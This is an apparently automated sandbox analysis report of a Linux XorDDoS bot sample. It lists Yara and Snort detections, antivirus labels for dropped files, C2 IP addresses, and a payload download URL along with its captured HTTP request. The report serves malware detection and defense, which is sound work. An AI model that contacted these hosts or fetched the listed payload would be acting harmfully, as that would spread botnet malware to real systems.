Process Memory Space: dkuidbsedp PID: 9953	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9964	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9975	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9988	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 9999	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10010	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10021	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10032	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10043	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10054	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10065	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10076	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10087	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10098	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10109	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10120	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10131	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10142	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10153	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10164	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10175	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10186	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10197	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10208	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dkuidbsedp PID: 10219	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Click to see the 235 entries

Snort Signatures

ET TROJAN DDoS.XOR Checkin - Source IP: 192.168.2.20 - Destination IP: 46.105.84.190

Timestamp:	192.168.2.2046.105.84.19041340532020381 07/27/22-09:48:16.981971
SID:	2020381
Source Port:	41340
Destination Port:	53
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN DDoS.XOR Checkin via HTTP - Source IP: 192.168.2.20 - Destination IP: 54.36.15.99

Timestamp:	192.168.2.2054.36.15.9950774802021336 07/27/22-09:48:16.811975
SID:	2021336
Source Port:	50774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: dkuidbsedp

Avira: detected

Antivirus detection for dropped file

Source: /lib/libudev.so	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/wrfeamwlub	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/wyyhrifhaz	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/txflbjqefg	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/zetazkptwu	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/wgpgdetjwe	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/zyapsjpaje	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/yfiimchuiz	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/whtzopaggc	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/qvilroogsz	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/kmavqzvhro	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/tudlcvpgbc	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/qjfxtxsijs	Avira: detection malicious, Label: LINUX/Xorddos.cona

Machine Learning detection for dropped file

Source: /lib/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/wrfeamwlub	Joe Sandbox ML: detected
Source: /usr/bin/wyyhrifhaz	Joe Sandbox ML: detected
Source: /usr/bin/txflbjqefg	Joe Sandbox ML: detected
Source: /usr/bin/zetazkptwu	Joe Sandbox ML: detected
Source: /usr/bin/wgpgdetjwe	Joe Sandbox ML: detected
Source: /usr/bin/zyapsjpaje	Joe Sandbox ML: detected
Source: /usr/bin/yfiimchuiz	Joe Sandbox ML: detected
Source: /usr/bin/whtzopaggc	Joe Sandbox ML: detected
Source: /usr/bin/qvilroogsz	Joe Sandbox ML: detected
Source: /usr/bin/kmavqzvhro	Joe Sandbox ML: detected
Source: /usr/bin/tudlcvpgbc	Joe Sandbox ML: detected
Source: /usr/bin/qjfxtxsijs	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: dkuidbsedp

Joe Sandbox ML: detected

Source: dkuidbsedp

Malware Configuration Extractor: XorDDoS {"C2 list": []}

Source: /tmp/dkuidbsedp (PID: 9446)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.20:50774 -> 54.36.15.99:80
Source: Traffic	Snort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.20:41340 -> 46.105.84.190:53

Source: global traffic	TCP traffic: 192.168.2.20:41340 -> 46.105.84.190:53
Source: global traffic	TCP traffic: 192.168.2.20:58332 -> 51.89.52.12:53

Source: unknown

TCP traffic detected without corresponding DNS query: 51.89.52.12

Source: dkuidbsedp, libudev.so.7.dr, wrfeamwlub.7.dr, wyyhrifhaz.7.dr, txflbjqefg.7.dr, zetazkptwu.7.dr, wgpgdetjwe.7.dr, zyapsjpaje.7.dr, yfiimchuiz.7.dr, whtzopaggc.7.dr, qvilroogsz.7.dr, kmavqzvhro.7.dr, tudlcvpgbc.7.dr, qjfxtxsijs.7.dr	String found in binary or memory: http://www.gnu.org/software/libc/bugs.html
Source: dkuidbsedp, 9445.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9450.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9453.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9457.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9546.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9557.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9568.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9579.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9590.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9601.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9612.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9623.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9634.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9644.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9656.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9667.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9678.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9689.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9700.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9711.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9722.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar
Source: dkuidbsedp, 9445.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9450.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9453.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9457.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t
Source: dkuidbsedp, 10263.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10274.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10285.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10296.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10307.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gk
Source: dkuidbsedp, 10208.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10219.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10230.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10241.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10252.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jv
Source: dkuidbsedp, 10098.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10109.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10120.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10131.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10142.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9km
Source: dkuidbsedp, 10428.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10439.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lh
Source: dkuidbsedp, 10373.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10384.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10395.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10406.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10417.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9pn
Source: dkuidbsedp, 9931.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9942.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9953.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9964.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9975.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qj
Source: dkuidbsedp, 9546.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9557.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9568.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9579.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9590.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9qv
Source: dkuidbsedp, 10318.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10329.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10340.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10351.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10362.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9rl
Source: dkuidbsedp, 9988.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9999.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10010.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10021.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10032.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tu
Source: dkuidbsedp, 9876.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9887.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9898.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9909.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9920.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tx
Source: dkuidbsedp, 9711.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9722.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9733.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9744.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9755.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wg
Source: dkuidbsedp, 10043.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10054.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10065.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10076.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10087.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wh
Source: dkuidbsedp, 9656.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9667.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9678.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9689.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9700.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wr
Source: dkuidbsedp, 9601.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9612.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9623.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9634.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9644.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wy
Source: dkuidbsedp, 9821.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9832.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9843.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9854.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9865.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yf
Source: dkuidbsedp, 10153.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10164.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10175.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10186.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 10197.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ze
Source: dkuidbsedp, 9766.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9777.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9788.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9799.1.00000000ff850000.00000000ff871000.rw-.sdmp, dkuidbsedp, 9810.1.00000000ff850000.00000000ff871000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zy

Source: unknown

DNS traffic detected: queries for: www1.gggatat456.com

Source: global traffic

HTTP traffic detected: GET /dd.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: www1.gggatat456.comConnection: Keep-Alive

DDoS

Yara detected XorDDoS Bot

Source: Yara match	File source: dkuidbsedp, type: SAMPLE
Source: Yara match	File source: 10241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9656.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9689.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10153.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9644.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9568.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9821.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10197.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9623.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9678.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10428.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9799.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10120.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9733.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9964.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9777.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10098.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9909.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9612.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9854.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9920.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10186.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9887.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9700.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9755.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9711.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10142.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10373.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9975.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9810.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9865.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9942.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10219.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9579.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9722.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10175.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9601.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9590.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9788.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10109.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9843.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9766.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9953.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9931.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9667.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9744.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10164.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9898.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9634.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10252.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9832.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10131.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9876.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9445, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9450, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9453, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9546, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9557, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9579, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9590, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9601, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9623, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9634, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9667, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9678, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9689, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9711, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9722, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9733, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9755, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9766, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9777, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9788, type: MEMORYSTR
